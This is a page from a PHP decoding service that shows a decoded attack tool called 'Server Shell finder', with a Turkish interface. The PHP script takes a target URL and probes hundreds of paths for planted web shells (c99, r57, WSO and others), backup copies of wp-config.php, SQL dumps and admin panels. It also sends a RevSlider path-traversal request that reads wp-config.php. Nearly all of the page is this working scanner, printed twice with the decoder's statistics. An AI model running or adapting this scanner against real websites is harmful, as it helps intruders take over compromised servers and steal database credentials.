Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

/* Decoded by unphp.net */ <?php echo '</head> <body> <body style="background-ima..

Decoded Output download

</head> 
 
<body> 
 
<body style="background-image: url('http://f1301.hizliresim.com/15/p/j5k6y.jpg'); background-repeat: repeat; background-position: center; background-attachment: fixed;"> 
<center> 
 
<br/> 
 
 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>Server Shell finder The-xatlivacip</title> 
<style type="text/css"> 
body{ 
        background: #000; 
        margin: 0; 
        padding: 0; 
        padding-top: 10px; 
        color: #FFF; 
        font-family: Calibri; 
        font-size: 13px; 
} 
a{ 
        color: #FFF; 
        text-decoration: none; 
        font-weight: bold; 
} 
.wrapper{ 
        width: 1000px; 
        margin: 0 auto; 
} 
.tube{ 
        padding: 10px; 
} 
.red{ 
        width: 998px; 
        border: 1px solid #e52224; 
        background: #191919; 
        color: #e52224 
} 
.red input{ 
        background: #000; 
        border: 1px solid #e52224; 
        color: #FFF; 
} 
.blue{ 
        float: left; 
        width: 1000px; 
        border: 1px solid #1d7fc3; 
        background: #191919; 
        color: #1d7fc3; 
} 
.green{ 
        float: left; 
        width: 1000px; 
        border: 1px solid #5fd419; 
        background: #191919; 
        color: #5fd419; 
} 
</style> 
<script type="text/javascript"> 
<!-- 
function insertcode($text, $place, $replace) 
{ 
        var $this = $text; 
        var logbox = document.getElementById($place); 
        if($replace == 0) 
                document.getElementById($place).innerHTML = logbox.innerHTML+$this; 
        else 
                document.getElementById($place).innerHTML = $this; 
//document.getElementById("helpbox").innerHTML = $this; 
} 
--> 
</script> 
</head> 
<body> 
<br /> 
<br /> 
<div class="wrapper"> 
<div class="red"> 
<div class="tube"> 
<form action="" method="post" name="xploit_form"> 
TARANACAK URL:<br /><input type="text" name="xploit_url" value="None" style="width: 100%;" /><br /><br /> 
 
<span style="float: right;"><input type="submit" name="xploit_submit" value="Shell Tara knk" align="right" /></span> 
</form> 
<br /> 
</div> <!-- /tube --> 
</div> <!-- /red --> 
<br /> 
<div class="green"> 
<div class="tube" id="rightcol"> 
Toplam Taranan: <span id="verified">0</span> / <span id="total">0</span><br /> 
Bulunan:<br /> 
</div> <!-- /tube --> 
</div> <!-- /green --> 
<br clear="all" /><br /> 
<div class="blue"> 
<div class="tube" id="logbox"> 
<br /> 
<br /><center><font color="#0033FF"> 
 
    
 
            <pre><center><br></span><span style="font-weight:bold; text-shadow:white 0px 0px 8px; color:red"><font  
 
 
 
 
 
color=red>#Marc0 Priv8 2013 Server Shell finder The-xatlivacip [v0.1] <---- ajanlar.org # m4rc0-security.blogspot.com/#</pre> 
 
     <hr> 
 
<br /> 
<br /> 
</div> <!-- /tube --> 
</div> <!-- /blue --> 
</div> <!-- /wrapper --> 
<br clear="all">

Did this file decode correctly?

Original Code

/* Decoded by unphp.net */

<?php echo '</head>

<body>

<body style="background-image: url(\'http://f1301.hizliresim.com/15/p/j5k6y.jpg\'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
<center>

<br/>

';
set_time_limit(0);
error_reporting(0);
$list['front'] = "admin
adm
admincp
admcp
cp
modcp
moderatorcp
adminare
admins
cpanel
controlpanel";
$list['end'] = "admin1.php
web1.php
root.php
wp-config.txt
wp-config.php~
wp-config.bak
wp-config.phpBak
wp-config.php-bak
wp-config.save
wp-config.back
wp-config.old
wp-config.html
wp-config.txt
web.root
izo.cin
/python/
code.php
r0t.php
up.php
up1.php
up2.php
up3.php
uploader.php
upload.php
yukle.php
upl04d3r.php
upload3.php
c0d3.php
sh3ll.php
asd.php
123.php
a.php
rec.php
koyz.php
koy.php
d4.php
kommand.php
kommant.php
command.php
red.php
/wp-includes/SimplePie/theme-options.php
recovers.php
recovery.php
/inc/config.txt
/inc/config.php
sym.php
symroot.php
symlinkuser.php
it.php
config.txt
izo.cin
webr00t.php
web.php
angel.php
/redirect-to/?redirect=http://pagebin.com/JopKidzK
/node/1/edit
/node/2/edit
/node/3/edit
/node/4/edit
/node/5/edit
/node/6/edit
/node/7/edit
/node/8/edit
/node/9/edit
/node/10/edit
/node/11/edit
/node/12/edit
/node/13/edit
/node/14/edit
/node/15/edit
/node/16/edit
/node/17/edit
/node/18/edit
/node/19/edit
/node/20/edit
/node/21/edit
/node/22/edit
/node/23/edit
/node/24/edit
/node/25/edit
/node/26/edit
/node/27/edit
/node/28/edit
/node/29/edit
/node/30/edit
/node/31/edit
options.php
locale.php
WSO.php
dz.php      
w.php      
/wp-content/plugins/akismet/akismet.php      
images/stories/w.php      
w.php   
/sym/
/configweb/
/symlinkuser/   
anon.php
shell.php        
madspot.php      
Cgishell.pl      
killer.php      
changeall.php      
2.php      
Sh3ll.php      
dz0.php      
dam.php      
user.php      
dom.php      
whmcs.php     
r00t.php      
1.php      
a.php      
r0k.php      
abc.php      
egy.php      
syrian_shell.php     
xxx.php      
settings.php      
tmp.php      
cyber.php      
c99.php      
r57.php      
404.php      
gaza.php      
1.php      
d4rk.php     
index1.php      
nkr.php      
xd.php      
M4r0c.php      
Dz.php      
sniper.php      
ksa.php      
v4team.php      
offline.php      
priv8.php      
911.php      
madspotshell.php      
c100.php      
sym.php      
cp.php      
tmp/cpn.php      
tmp/w.php      
tmp/r57.php      
tmp/king.php      
tmp/sok.php      
tmp/ss.php      
tmp/as.php      
tmp/dz.php      
tmp/r1z.php      
tmp/whmcs.php      
tmp/root.php      
tmp/r00t.php      
templates/beez/index.php      
/wp-content/plugins/disqus-comment-system/mysql.php      
/wp-content/plugins/disqus-comment-system/WolF.php      
/wp-content/plugins/disqus-comment-system/madspot.php      
/wp-content/plugins/disqus-comment-system/Cgishell.pl      
/wp-content/plugins/disqus-comment-system/killer.php      
/wp-content/plugins/disqus-comment-system/changeall.php       
/wp-content/plugins/disqus-comment-system/sa.php      
/wp-content/plugins/disqus-comment-system/sysadmins/      
/wp-content/plugins/disqus-comment-system/admin1/      
/wp-content/plugins/disqus-comment-system/sniper.php      
/wp-content/plugins/disqus-comment-system/images/Sym.php      
/wp-content/plugins/disqus-comment-system//r57.php      
/wp-content/plugins/disqus-comment-system/gzaa_spysl      
/wp-content/plugins/disqus-comment-system/sql-new.php      
/wp-content/plugins/disqus-comment-system//shell.php      
/wp-content/plugins/disqus-comment-system//sa.php      
/wp-content/plugins/disqus-comment-system//admin.php        
/wp-content/plugins/akismet/ssl.php      
/wp-content/plugins/akismet/mysql.php      
/wp-content/plugins/akismet/WolF.php      
/wp-content/plugins/akismet/madspot.php      
/wp-content/plugins/akismet/Cgishell.pl      
/wp-content/plugins/akismet/killer.php      
/wp-content/plugins/akismet/changeall.php      
/wp-content/plugins/akismet//sa2.php           
/wp-content/plugins/google-sitemap-generator/r00t-s3c.php      
/wp-content/plugins/google-sitemap-generator/c.php      
/wp-content/plugins/google-sitemap-generator//backup.sql      
/wp-content/plugins/google-sitemap-generator//back.sql      
/wp-content/plugins/google-sitemap-generator//data.sql      
/templates/beez/user.php      
/templates/beez/dom.php      
/templates/beez/whmcs.php      
/templates/beez/vb.zip      
/templates/beez/r00t.php      
/templates/beez/c99.php      
/templates/beez/gaza.php      
/templates/beez/1.php          
/images/Sym.php      
/images/c22.php      
/images/c100.php      
/images/configuration.php      
/images/g.php      
/images/xx.pl      
/images/ls.php      
/images/Cpanel.php      
/images/k.php      
/images/zone-h.php      
/images/tmp/user.php      
/images/tmp/Sym.php      
/images/cp.php      
/images/tmp/madspotshell.php      
/images/tmp/root.php      
/images/tmp/whmcs.php      
/images/tmp/index.php      
/images/tmp/2.php      
/images/tmp/dz.php      
/images/tmp/cpn.php      
/images/tmp/changeall.php      
/images/tmp/Cgishell.pl      
/images/tmp/sql.php      
/images/up.php      
/images/vb.zip      
/images/vb.rar      
/images/admin2.asp      
/images/uploads.php      
/images/sa.php      
/images/sysadmins/      
/images/admin1/      
/images/sniper.php      
/images/images/Sym.php      
/images//r57.php      
/images/gzaa_spysl      
/images/sql-new.php      
/images//shell.php      
/images//sa.php      
/images//admin.php      
/images//sa2.php      
/images//2.php      
/images//gaza.php      
/images//up.php      
/images//upload.php      
/images//uploads.php      
/images/shell.php      
/images//amad.php      
/images//t00.php      
/images//dz.php      
/images//site.rar      
/images//Black.php      
/images//site.tar.gz      
/images//error_log      
/images//error      
/images//cpanel      
/images//awstats      
/images//site.sql      
/images//vb.sql      
/images//forum.sql      
/images/r00t-s3c.php      
/images/c.php      
/images//backup.sql      
/images//back.sql      
/images//data.sql      
/images/wp.rar/      
/images/asp.aspx      
/images/tmp/vaga.php      
/images/tmp/killer.php      
/images/whmcs.php      
/images/abuhlail.php         
/images/X.php      
/images/123.php      
/images/m.php      
/images/b.php      
/images/up.php      
/images/tmp/dz1.php      
/images/dz1.php      
/images/forum.zip      
/images/Symlink.php      
/images/Symlink.pl      
/images/forum.rar      
/images/joomla.zip      
/images/joomla.rar      
/images/wp.php      
/images/buck.sql      
/includes/WSO.php      
/includes/dz.php      
/includes/DZ.php      
/includes/cpanel.php      
/includes/cpn.php      
/includes/sos.php      
/includes/term.php      
/includes/Sec-War.php      
/includes/sql.php      
/includes/ssl.php      
/includes/mysql.php      
/includes/WolF.php      
/includes/madspot.php      
/includes/Cgishell.pl      
/includes/killer.php      
/includes/changeall.php      
/includes/2.php      
/includes/Sh3ll.php      
/includes/dz0.php      
/includes/dam.php      
/includes/user.php      
/includes/dom.php      
/includes/whmcs.php      
/includes/vb.zip      
/includes/r00t.php      
/includes/c99.php      
/includes/gaza.php      
/includes/1.php      
/includes/d0mains.php      
/includes/madspotshell.php      
/includes/info.php      
/includes/egyshell.php      
/includes/Sym.php      
/includes/c22.php      
/includes/c100.php      
/includes/configuration.php      
/includes/g.php      
/includes/xx.pl      
/includes/ls.php      
/includes/Cpanel.php      
/includes/k.php      
/includes/zone-h.php      
/includes/tmp/user.php      
/includes/tmp/Sym.php      
/includes/cp.php      
/includes/tmp/madspotshell.php      
/includes/tmp/root.php      
/includes/tmp/whmcs.php      
/includes/tmp/index.php      
/includes/tmp/2.php      
/includes/tmp/dz.php      
/includes/tmp/cpn.php      
/includes/tmp/changeall.php      
/includes/tmp/Cgishell.pl      
/includes/tmp/sql.php      
/includes/0day.php      
/includes/tmp/admin.php      
/includes/L3b.php      
/includes/d.php      
/includes/tmp/d.php      
/includes/tmp/L3b.php      
/includes/sado.php      
/includes/admin1.php      
/includes/upload.php      
/includes/up.php      
/includes/vb.zip      
/includes/vb.rar      
/includes/admin2.asp      
/includes/uploads.php      
/includes/sa.php      
/includes/sysadmins/      
/templates/rhuk_milkyway/tmp/d.php      
/templates/rhuk_milkyway/tmp/L3b.php      
/templates/rhuk_milkyway/sado.php      
/templates/rhuk_milkyway/admin1.php      
/templates/rhuk_milkyway/upload.php      
/templates/rhuk_milkyway/      
WSO.php      
a.php      
z.php      
e.php      
r.php      
t.php      
y.php      
u.php      
i.php      
o.php      
p.php      
q.php      
s.php      
d.php      
f.php      
g.php      
h.php      
j.php      
k.php      
l.php      
m.php      
w.php      
x.php      
c.php      
v.php      
b.php      
n.php      
1.php      
2.php      
3.php      
4.php      
5.php      
6.php      
7.php      
8.php      
9.php      
10.php      
12.php      
11.php      
1234.php
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
login.htm
login.html
admin.htm
admin.html
yonetim.asp
yonetim.php
giris.php
login.asp
wp-login
wp-login.php
/admin/
/login
/panel/
/yonetim/
/giris/
UserLogin
login.php
admin.php
admin.asp
admin.html
administrator.php
administrator.asp
admincp
admin/login.php
admin/login.asp gibidir.
faa_tools/login.php?prev_page=/faa_tools/
/wseltzer/Antitrust
/training/compendium/administer/admintrainingevents.aspx
sh3ll.php
ssh.php
ps/ps.php
templates/undp_2/index.php
templates/undp_2/r57.php
templates/undp_2/c99.php
templates/undp_2/c100.php
templates/undp/r00t.php
templates/undp/sym.php
templates/undp/wsob.php
templates/undp/web1.php
templates/undp/cgiweb
/templates/beez/shell.php
/templates/beez/r57.php
/templates/beez/c99.php
/templates/beez/c100.php
/templates/beez/safe.php
/templates/beez/bypass.php
/templates/beez/r00t.php
/templates/beez/sym.php
/templates/beez/cgiweb
/templates/shell.php
/templates/r57.php
/templates/c99.php
/templates/c100.php
/templates/sym.php
/templates/cgiweb
cache/
cgishell
cgiweb
/admin/anket.php
domain.php
dom.php
python
templates/beez/cgirun
templates/beez/configler
templates/beez/cgitelnet1
sym
sym.php
wsob.php
r00t.php
cgiweb/";
function template() {
    echo '
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Server Shell finder The-xatlivacip</title>
<style type="text/css">
body{
        background: #000;
        margin: 0;
        padding: 0;
        padding-top: 10px;
        color: #FFF;
        font-family: Calibri;
        font-size: 13px;
}
a{
        color: #FFF;
        text-decoration: none;
        font-weight: bold;
}
.wrapper{
        width: 1000px;
        margin: 0 auto;
}
.tube{
        padding: 10px;
}
.red{
        width: 998px;
        border: 1px solid #e52224;
        background: #191919;
        color: #e52224
}
.red input{
        background: #000;
        border: 1px solid #e52224;
        color: #FFF;
}
.blue{
        float: left;
        width: 1000px;
        border: 1px solid #1d7fc3;
        background: #191919;
        color: #1d7fc3;
}
.green{
        float: left;
        width: 1000px;
        border: 1px solid #5fd419;
        background: #191919;
        color: #5fd419;
}
</style>
<script type="text/javascript">
<!--
function insertcode($text, $place, $replace)
{
        var $this = $text;
        var logbox = document.getElementById($place);
        if($replace == 0)
                document.getElementById($place).innerHTML = logbox.innerHTML+$this;
        else
                document.getElementById($place).innerHTML = $this;
//document.getElementById("helpbox").innerHTML = $this;
}
-->
</script>
</head>
<body>
<br />
<br />
<div class="wrapper">
<div class="red">
<div class="tube">
<form action="" method="post" name="xploit_form">
TARANACAK URL:<br /><input type="text" name="xploit_url" value="' . $_POST['xploit_url'] . '" style="width: 100%;" /><br /><br />

<span style="float: right;"><input type="submit" name="xploit_submit" value="Shell Tara knk" align="right" /></span>
</form>
<br />
</div> <!-- /tube -->
</div> <!-- /red -->
<br />
<div class="green">
<div class="tube" id="rightcol">
Toplam Taranan: <span id="verified">0</span> / <span id="total">0</span><br />
Bulunan:<br />
</div> <!-- /tube -->
</div> <!-- /green -->
<br clear="all" /><br />
<div class="blue">
<div class="tube" id="logbox">
<br />
<br /><center><font color="#0033FF">

   

            <pre><center><br></span><span style="font-weight:bold; text-shadow:white 0px 0px 8px; color:red"><font 





color=red>#Marc0 Priv8 2013 Server Shell finder The-xatlivacip [v0.1] <---- ajanlar.org # m4rc0-security.blogspot.com/#</pre>

     <hr>

<br />
<br />
</div> <!-- /tube -->
</div> <!-- /blue -->
</div> <!-- /wrapper -->
<br clear="all">';
}
function show($msg, $br = 1, $stop = 0, $place = 'logbox', $replace = 0) {
    if ($br == 1) $msg.= "<br />";
    echo "<script type=\"text/javascript\">insertcode('" . $msg . "', '" . $place . "', '" . $replace . "');</script>";
    if ($stop == 1) exit;
    @flush();
    @ob_flush();
}
function check($x, $front = 0) {
    global $_POST, $site, $false;
    if ($front == 0) $t = $site . $x;
    else $t = 'http://' . $x . '.' . $site . '/';
    $headers = get_headers($t);
    if (!eregi('200', $headers[0])) return 0;
    $data = @file_get_contents($t);
    if ($_POST['xploit_404string'] == "") if ($data == $false) return 0;
    if ($_POST['xploit_404string'] != "") if (strpos($data, $_POST['xploit_404string'])) return 0;
    return 1;
}
template();
if (!isset($_POST['xploit_url'])) die;
if ($_POST['xploit_url'] == '') die;
$site = $_POST['xploit_url'];
if ($site[strlen($site) - 1] != "/") $site.= "/";
if ($_POST['xploit_404string'] == "") $false = @file_get_contents($site . "d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
$list['end'] = str_replace("
", "", $list['end']);
$list['front'] = str_replace("
", "", $list['front']);
$pathes = explode("
", $list['end']);
$frontpathes = explode("
", $list['front']);
show(count($pathes) + count($frontpathes), 1, 0, 'total', 1);
$verificate = 0;
foreach ($pathes as $path) {
    show('Tar&#305;yorum reis ' . $site . $path . ' : ', 0, 0, 'logbox', 0);
    $verificate++;
    show($verificate, 0, 0, 'verified', 1);
    if (check($path) == 0) show('Bulunamad&#305; :(', 1, 0, 'logbox', 0);
    else {
        show('<span style="color: #00FF00;"><strong>Buldu</strong></span>', 1, 0, 'logbox', 0);
        show('<a href="' . $site . $path . '">' . $site . $path . '</a>', 1, 0, 'rightcol', 0);
    }
}
preg_match("/\/\/(.*?)\//i", $site, $xx);
$site = $xx[1];
if (substr($site, 0, 3) == "www") $site = substr($site, 4);
foreach ($frontpathes as $frontpath) {
    show('Tar&#305;yorum reis http://' . $frontpath . '.' . $site . '/ : ', 0, 0, 'logbox', 0);
    $verificate++;
    show($verificate, 0, 0, 'verified', 1);
    if (check($frontpath, 1) == 0) show('Bulunamad&#305; :(', 1, 0, 'logbox', 0);
    else {
        show('<span style="color: #00FF00;"><strong>Buldu</strong></span>', 1, 0, 'logbox', 0);
        show('<a href="http://' . $frontpath . '.' . $site . '/">' . $frontpath . '.' . $site . '</a>', 1, 0, 'rightcol', 0);
    }
};
echo '
';

Function Calls

strlen 1
template 1
set_time_limit 1
error_reporting 1

Variables

$list [{'key': 'front', 'value': 'admin \nadm \nadmincp \nadmcp \ncp \nmodcp \nmoderatorcp \nadminare \nadmins \ncpanel \ncontrolpanel'}, {'key': 'end', 'value': 'admin1.php \nweb1.php \nroot.php \nwp-config.txt \nwp-config.php~ \nwp-config.bak \nwp-config.phpBak \nwp-config.php-bak \nwp-config.save \nwp-config.back \nwp-config.old \nwp-config.html \nwp-config.txt \nweb.root \nizo.cin \n/python/ \ncode.php \nr0t.php \nup.php \nup1.php \nup2.php \nup3.php \nuploader.php \nupload.php \nyukle.php \nupl04d3r.php \nupload3.php \nc0d3.php \nsh3ll.php \nasd.php \n123.php \na.php \nrec.php \nkoyz.php \nkoy.php \nd4.php \nkommand.php \nkommant.php \ncommand.php \nred.php \n/wp-includes/SimplePie/theme-options.php \nrecovers.php \nrecovery.php \n/inc/config.txt \n/inc/config.php \nsym.php \nsymroot.php \nsymlinkuser.php \nit.php \nconfig.txt \nizo.cin \nwebr00t.php \nweb.php \nangel.php \n/redirect-to/?redirect=http://pagebin.com/JopKidzK \n/node/1/edit \n/node/2/edit \n/node/3/edit \n/node/4/edit \n/node/5/edit \n/node/6/edit \n/node/7/edit \n/node/8/edit \n/node/9/edit \n/node/10/edit \n/node/11/edit \n/node/12/edit \n/node/13/edit \n/node/14/edit \n/node/15/edit \n/node/16/edit \n/node/17/edit \n/node/18/edit \n/node/19/edit \n/node/20/edit \n/node/21/edit \n/node/22/edit \n/node/23/edit \n/node/24/edit \n/node/25/edit \n/node/26/edit \n/node/27/edit \n/node/28/edit \n/node/29/edit \n/node/30/edit \n/node/31/edit \noptions.php \nlocale.php \nWSO.php \ndz.php \nw.php \n/wp-content/plugins/akismet/akismet.php \nimages/stories/w.php \nw.php \n/sym/ \n/configweb/ \n/symlinkuser/ \nanon.php \nshell.php \nmadspot.php \nCgishell.pl \nkiller.php \nchangeall.php \n2.php \nSh3ll.php \ndz0.php \ndam.php \nuser.php \ndom.php \nwhmcs.php \nr00t.php \n1.php \na.php \nr0k.php \nabc.php \negy.php \nsyrian_shell.php \nxxx.php \nsettings.php \ntmp.php \ncyber.php \nc99.php \nr57.php \n404.php \ngaza.php \n1.php \nd4rk.php \nindex1.php \nnkr.php \nxd.php \nM4r0c.php \nDz.php \nsniper.php \nksa.php \nv4team.php \noffline.php \npriv8.php \n911.php \nmadspotshell.php \nc100.php \nsym.php \ncp.php \ntmp/cpn.php \ntmp/w.php \ntmp/r57.php \ntmp/king.php \ntmp/sok.php \ntmp/ss.php \ntmp/as.php \ntmp/dz.php \ntmp/r1z.php \ntmp/whmcs.php \ntmp/root.php \ntmp/r00t.php \ntemplates/beez/index.php \n/wp-content/plugins/disqus-comment-system/mysql.php \n/wp-content/plugins/disqus-comment-system/WolF.php \n/wp-content/plugins/disqus-comment-system/madspot.php \n/wp-content/plugins/disqus-comment-system/Cgishell.pl \n/wp-content/plugins/disqus-comment-system/killer.php \n/wp-content/plugins/disqus-comment-system/changeall.php \n/wp-content/plugins/disqus-comment-system/sa.php \n/wp-content/plugins/disqus-comment-system/sysadmins/ \n/wp-content/plugins/disqus-comment-system/admin1/ \n/wp-content/plugins/disqus-comment-system/sniper.php \n/wp-content/plugins/disqus-comment-system/images/Sym.php \n/wp-content/plugins/disqus-comment-system//r57.php \n/wp-content/plugins/disqus-comment-system/gzaa_spysl \n/wp-content/plugins/disqus-comment-system/sql-new.php \n/wp-content/plugins/disqus-comment-system//shell.php \n/wp-content/plugins/disqus-comment-system//sa.php \n/wp-content/plugins/disqus-comment-system//admin.php \n/wp-content/plugins/akismet/ssl.php \n/wp-content/plugins/akismet/mysql.php \n/wp-content/plugins/akismet/WolF.php \n/wp-content/plugins/akismet/madspot.php \n/wp-content/plugins/akismet/Cgishell.pl \n/wp-content/plugins/akismet/killer.php \n/wp-content/plugins/akismet/changeall.php \n/wp-content/plugins/akismet//sa2.php \n/wp-content/plugins/google-sitemap-generator/r00t-s3c.php \n/wp-content/plugins/google-sitemap-generator/c.php \n/wp-content/plugins/google-sitemap-generator//backup.sql \n/wp-content/plugins/google-sitemap-generator//back.sql \n/wp-content/plugins/google-sitemap-generator//data.sql \n/templates/beez/user.php \n/templates/beez/dom.php \n/templates/beez/whmcs.php \n/templates/beez/vb.zip \n/templates/beez/r00t.php \n/templates/beez/c99.php \n/templates/beez/gaza.php \n/templates/beez/1.php \n/images/Sym.php \n/images/c22.php \n/images/c100.php \n/images/configuration.php \n/images/g.php \n/images/xx.pl \n/images/ls.php \n/images/Cpanel.php \n/images/k.php \n/images/zone-h.php \n/images/tmp/user.php \n/images/tmp/Sym.php \n/images/cp.php \n/images/tmp/madspotshell.php \n/images/tmp/root.php \n/images/tmp/whmcs.php \n/images/tmp/index.php \n/images/tmp/2.php \n/images/tmp/dz.php \n/images/tmp/cpn.php \n/images/tmp/changeall.php \n/images/tmp/Cgishell.pl \n/images/tmp/sql.php \n/images/up.php \n/images/vb.zip \n/images/vb.rar \n/images/admin2.asp \n/images/uploads.php \n/images/sa.php \n/images/sysadmins/ \n/images/admin1/ \n/images/sniper.php \n/images/images/Sym.php \n/images//r57.php \n/images/gzaa_spysl \n/images/sql-new.php \n/images//shell.php \n/images//sa.php \n/images//admin.php \n/images//sa2.php \n/images//2.php \n/images//gaza.php \n/images//up.php \n/images//upload.php \n/images//uploads.php \n/images/shell.php \n/images//amad.php \n/images//t00.php \n/images//dz.php \n/images//site.rar \n/images//Black.php \n/images//site.tar.gz \n/images//error_log \n/images//error \n/images//cpanel \n/images//awstats \n/images//site.sql \n/images//vb.sql \n/images//forum.sql \n/images/r00t-s3c.php \n/images/c.php \n/images//backup.sql \n/images//back.sql \n/images//data.sql \n/images/wp.rar/ \n/images/asp.aspx \n/images/tmp/vaga.php \n/images/tmp/killer.php \n/images/whmcs.php \n/images/abuhlail.php \n/images/X.php \n/images/123.php \n/images/m.php \n/images/b.php \n/images/up.php \n/images/tmp/dz1.php \n/images/dz1.php \n/images/forum.zip \n/images/Symlink.php \n/images/Symlink.pl \n/images/forum.rar \n/images/joomla.zip \n/images/joomla.rar \n/images/wp.php \n/images/buck.sql \n/includes/WSO.php \n/includes/dz.php \n/includes/DZ.php \n/includes/cpanel.php \n/includes/cpn.php \n/includes/sos.php \n/includes/term.php \n/includes/Sec-War.php \n/includes/sql.php \n/includes/ssl.php \n/includes/mysql.php \n/includes/WolF.php \n/includes/madspot.php \n/includes/Cgishell.pl \n/includes/killer.php \n/includes/changeall.php \n/includes/2.php \n/includes/Sh3ll.php \n/includes/dz0.php \n/includes/dam.php \n/includes/user.php \n/includes/dom.php \n/includes/whmcs.php \n/includes/vb.zip \n/includes/r00t.php \n/includes/c99.php \n/includes/gaza.php \n/includes/1.php \n/includes/d0mains.php \n/includes/madspotshell.php \n/includes/info.php \n/includes/egyshell.php \n/includes/Sym.php \n/includes/c22.php \n/includes/c100.php \n/includes/configuration.php \n/includes/g.php \n/includes/xx.pl \n/includes/ls.php \n/includes/Cpanel.php \n/includes/k.php \n/includes/zone-h.php \n/includes/tmp/user.php \n/includes/tmp/Sym.php \n/includes/cp.php \n/includes/tmp/madspotshell.php \n/includes/tmp/root.php \n/includes/tmp/whmcs.php \n/includes/tmp/index.php \n/includes/tmp/2.php \n/includes/tmp/dz.php \n/includes/tmp/cpn.php \n/includes/tmp/changeall.php \n/includes/tmp/Cgishell.pl \n/includes/tmp/sql.php \n/includes/0day.php \n/includes/tmp/admin.php \n/includes/L3b.php \n/includes/d.php \n/includes/tmp/d.php \n/includes/tmp/L3b.php \n/includes/sado.php \n/includes/admin1.php \n/includes/upload.php \n/includes/up.php \n/includes/vb.zip \n/includes/vb.rar \n/includes/admin2.asp \n/includes/uploads.php \n/includes/sa.php \n/includes/sysadmins/ \n/templates/rhuk_milkyway/tmp/d.php \n/templates/rhuk_milkyway/tmp/L3b.php \n/templates/rhuk_milkyway/sado.php \n/templates/rhuk_milkyway/admin1.php \n/templates/rhuk_milkyway/upload.php \n/templates/rhuk_milkyway/ \nWSO.php \na.php \nz.php \ne.php \nr.php \nt.php \ny.php \nu.php \ni.php \no.php \np.php \nq.php \ns.php \nd.php \nf.php \ng.php \nh.php \nj.php \nk.php \nl.php \nm.php \nw.php \nx.php \nc.php \nv.php \nb.php \nn.php \n1.php \n2.php \n3.php \n4.php \n5.php \n6.php \n7.php \n8.php \n9.php \n10.php \n12.php \n11.php \n1234.php \n/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php \nlogin.htm \nlogin.html \nadmin.htm \nadmin.html \nyonetim.asp \nyonetim.php \ngiris.php \nlogin.asp \nwp-login \nwp-login.php \n/admin/ \n/login \n/panel/ \n/yonetim/ \n/giris/ \nUserLogin \nlogin.php \nadmin.php \nadmin.asp \nadmin.html \nadministrator.php \nadministrator.asp \nadmincp \nadmin/login.php \nadmin/login.asp gibidir. \nfaa_tools/login.php?prev_page=/faa_tools/ \n/wseltzer/Antitrust \n/training/compendium/administer/admintrainingevents.aspx \nsh3ll.php \nssh.php \nps/ps.php \ntemplates/undp_2/index.php \ntemplates/undp_2/r57.php \ntemplates/undp_2/c99.php \ntemplates/undp_2/c100.php \ntemplates/undp/r00t.php \ntemplates/undp/sym.php \ntemplates/undp/wsob.php \ntemplates/undp/web1.php \ntemplates/undp/cgiweb \n/templates/beez/shell.php \n/templates/beez/r57.php \n/templates/beez/c99.php \n/templates/beez/c100.php \n/templates/beez/safe.php \n/templates/beez/bypass.php \n/templates/beez/r00t.php \n/templates/beez/sym.php \n/templates/beez/cgiweb \n/templates/shell.php \n/templates/r57.php \n/templates/c99.php \n/templates/c100.php \n/templates/sym.php \n/templates/cgiweb \ncache/ \ncgishell \ncgiweb \n/admin/anket.php \ndomain.php \ndom.php \npython \ntemplates/beez/cgirun \ntemplates/beez/configler \ntemplates/beez/cgitelnet1 \nsym \nsym.php \nwsob.php \nr00t.php \ncgiweb/'}]
$site None

Stats

MD5 267ab11a6b90eeed2d3b77ffab985d5e
Eval Count 0
Decode Time 146 ms